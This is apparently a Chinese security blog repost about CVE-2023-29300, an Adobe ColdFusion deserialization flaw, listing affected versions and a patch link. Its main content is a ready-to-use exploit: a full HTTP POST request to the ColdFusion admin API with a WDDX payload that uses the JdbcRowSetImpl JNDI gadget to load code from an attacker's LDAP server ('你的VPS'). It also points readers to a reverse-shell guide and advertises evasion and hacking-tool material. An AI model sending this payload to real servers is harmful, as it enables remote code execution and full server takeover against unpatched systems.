正文

叮~你有新的速递!CVE-2023-29300 RCE漏洞(附EXP)

admin
admin V管理员 /0 评论 /1036 阅读
0801
此篇文章发布距今已超过479天,您需要注意文章的内容或图片是否可用!

0x01 前言

Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可能导致服务器失陷,获取服务器权限

0x02 影响平台

    ColdFusion 2018 <= Update 16     ColdFusion 2021 <= Update 6     ColdFusion 2023 GA Release (2023.0.0.330468)

0x03 漏洞复现

页面是这个酱紫

EXP:

POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Connection: closeContent-Length: 310Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate
argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>ldap%3a//你的VPS/rwqed</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

success

反弹shell可以借鉴K8实验室的一篇文章写的比较详细:

https://mp.weixin.qq.com/s/UMlPzdqfjF-0P3or-O4XQw

0x04 参考来源

https://mp.weixin.qq.com/s/0kAmp-gucJ3ghdDAcInWbghttps://mp.weixin.qq.com/s/UMlPzdqfjF-0P3or-O4XQw

0x05 修复方案

目前厂商已发布升级补丁以修复漏洞,建议及时更新至最新版本!
https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

往期推荐

【漏洞系列】

【漏洞系列】

【漏洞系列】

叮~你有新的速递!CVE-2023-29922漏洞(附脚本)

【漏洞系列】

【漏洞系列】

【漏洞系列】

【免杀系列】

【免杀系列】

【免杀系列】

【免杀系列】

【移动安全】

【移动安全】


觉得内容不错,就点下在看
如侵权请私聊公众号删文


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-宙飒天下网